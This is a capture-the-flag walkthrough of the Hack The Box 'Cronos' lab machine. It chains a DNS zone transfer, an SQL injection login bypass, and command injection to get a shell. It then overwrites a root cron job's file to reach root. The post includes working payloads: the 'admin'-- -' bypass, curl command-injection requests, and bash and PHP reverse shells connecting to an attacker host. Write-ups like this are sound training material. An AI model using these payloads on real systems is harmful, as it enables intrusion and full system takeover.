Post

Cronos

DNS zone transfer exposes a hidden admin subdomain whose login is bypassed with SQL injection; an authenticated command injection field then grants a shell as www-data.

Cronos

Overview

Cronos is a medium-difficulty Linux machine. DNS zone transfer reveals the hidden admin.cronos.htb subdomain; a classic SQL injection auth bypass opens the admin panel; and an authenticated command injection in the Net Tool page lands a shell as www-data. Root comes from a root-owned cron job executing a Laravel artisan file that www-data can overwrite — replacing it with a PHP reverse shell delivers a root shell within 60 seconds.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

High Enumeration and Real-Life scores reflect a multi-layer DNS and web enumeration chain built entirely on production-realistic misconfigurations — no CVE required, minimal custom code.

Recon

PortServiceNotes
22/tcpOpenSSHSSH access
53/tcp/udpISC BINDDNS — zone transfers open
80/tcpApachecronos.htb main site
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p22,53,80 -sC -sV -Pn 10.10.10.X

Port 53 standing open on a web machine is the first hint — BIND responding to zone transfer requests from any client is the entry point that unlocks everything else.

Enumeration

Reverse-lookup the IP to discover the base domain, then pull the full zone:

1
2
nslookup 10.10.10.X 10.10.10.X
dig axfr @10.10.10.X cronos.htb

The zone transfer (CWE-200) returns every DNS record, including admin.cronos.htb and www.cronos.htb. Add them all to /etc/hosts:

1
echo "10.10.10.X cronos.htb admin.cronos.htb www.cronos.htb" | sudo tee -a /etc/hosts

Browsing to admin.cronos.htb presents a login form. The main cronos.htb site offers no attack surface; admin.cronos.htb is the target.

Foothold

Step 1 — SQL injection auth bypass (CWE-89):

The login query is built with raw string concatenation. Injecting admin'-- - as the username terminates the string and comments out the password clause entirely:

1
2
curl -s -c /tmp/cronos.txt -X POST http://admin.cronos.htb/ \
  -d "username=admin'-- -&password=x" -L | grep -i "welcome\|logout\|command" | head -3

A successful response lands in the authenticated “Net Tool” panel at /welcome.php.

Step 2 — OS command injection (CWE-78):

The Net Tool page passes the command POST parameter to PHP’s exec() with no validation. Confirm RCE:

1
2
curl -s -b /tmp/cronos.txt -X POST http://admin.cronos.htb/welcome.php \
  -d 'command=id&host='

Response includes uid=33(www-data). Upgrade to an interactive shell; start a listener on the attack box first:

1
nc -lvnp 9001

Then send the reverse shell:

1
2
3
curl -s -b /tmp/cronos.txt -X POST http://admin.cronos.htb/welcome.php \
  --data-urlencode 'command=bash -c "bash -i >& /dev/tcp/10.10.10.X/9001 0>&1"' \
  --data-urlencode 'host='

Shell arrives as www-data.

User flag

1
cat /home/cronos/user.txt   # HTB{...}

Landing as www-data gives access to the cronos user’s home directory; the user flag is ours.

Privilege Escalation

Check the system crontab from the www-data shell:

1
cat /etc/crontab

The output shows root running php /var/www/laravel/artisan schedule:run every minute. Verify the file permissions (CWE-732):

1
ls -la /var/www/laravel/artisan

The file is writable by www-data. Overwrite it with a PHP reverse shell (CWE-269); start a second listener first:

1
nc -lvnp 9002

Then on the target:

1
2
echo '<?php exec("bash -c '\''bash -i >& /dev/tcp/10.10.10.X/9002 0>&1'\''"); ?>' \
  > /var/www/laravel/artisan

Within 60 seconds the cron fires, PHP executes the overwritten artisan, and the listener receives a root shell:

1
2
# id
uid=0(root) gid=0(root) groups=0(root)

Root flag

1
cat /root/root.txt   # HTB{...}

Full compromise achieved — root shell via a writable cron target confirms complete control of the machine.

This post is licensed under CC BY 4.0 by the author.